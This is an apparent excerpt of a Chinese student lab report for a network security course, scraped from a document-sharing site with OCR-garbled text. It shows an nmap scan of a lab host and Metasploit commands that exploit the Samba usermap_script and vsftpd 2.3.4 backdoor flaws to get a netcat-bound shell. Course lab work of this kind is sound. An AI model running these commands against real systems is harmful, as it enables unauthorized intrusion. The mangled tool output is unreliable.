课程实验报告.docx
《课程实验报告.docx》由会员分享,可在线阅读,更多相关《课程实验报告.docx(10页珍藏版)》请在优知文库上搜索。
1、等中科技火浮课程实验报告课程名称:网络空间安全综合实践山专业班级:学号:姓名:报告日期:2021625一、实验过程中遇到的问题和解决方法1.1. 渗透测试和流量分析本次实验分为渗透测试和流量分析两个部分。1.1.1. 渗透测试渗透测试实验主要是熟练运用发现漏洞和利用漏洞的命令。首先进行端口扫描来发现漏洞:nmap-T4-sV-v192.168.206.131FileActionsEditViewHaPNotshown:977closedportsIPORTSERVICEVERSION21/Up“PVSftpd2.3.422/UpSShOpenSSH.7lDebian8d3.X-4.X(work
2、group:WORKGROUP)445/tCPnetbios-ssnSambasHd3.X-4.X(workgroup:WORKGROUP)512/tcp“0Cnetkit-rshrexecd513/tcploginOponBSOorSolarisHogind5Utcptcpwrjppd1099/tcpava-raiGNUCUsspathgriregistry1524/tCpblrdsheUNetasploitablerootshell2049/tCpnfs2-(RPCffieM3)2ltcpHPProFTPO1.3.133MtcpMySQl5.e.51a-3ubs:/nnap.orgsuti
3、t/.Nnapdone:1IPaddress(1hostup)scannedin12.29secondsTI从而发现SAMBAMS-RPCSHE1.1.命令注入漏洞。在执行漏洞攻击的过程中,我们先启动Metasploit,搜索有关samba漏洞的代码库:searchsamba然后使用USernIap_script代码,查看攻击载荷:useexploit/multi/samba/usermapscriptshowpayloads接着选择bindnetcat,即使用netcat工具在渗透攻击成功后执行shel1并通过netcat绑定在一个监听端口上:setpayloademd/unix/bindn
4、etcat在查看参数配置后,设置目标ip、Port等参数:showoptionssetRHOST192.168.206.1315msf5searchVSftPdMatchingModulesNameDisclosureDateRankCheckDescription0xploitunix/ftp/SBH.234.backdoor2011-07-03excellentNoVSFFPQv23.4BackdoorCoemandExecutionmsf5useexploit/unix/ftp/vsftpd_23showoptionsModuleoptions(exploitunixftpvsftpd_
5、234-backdoor):NameCurrentSettingRequiredDescriptionRHOSTSysThetargethost(s)vrangeCIORIdentifierlorhostsfilewithsyntax,file,RPORT21yesThetargetport(TCP)Payloadoptions(cmd/unix/interact):NameCurrentSettingRequiredDescriptionExploittarget:IdNane0AutOMticElfSexploit()setRHOST192.168.206.131RHOST=192168.
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 课程 实验 报告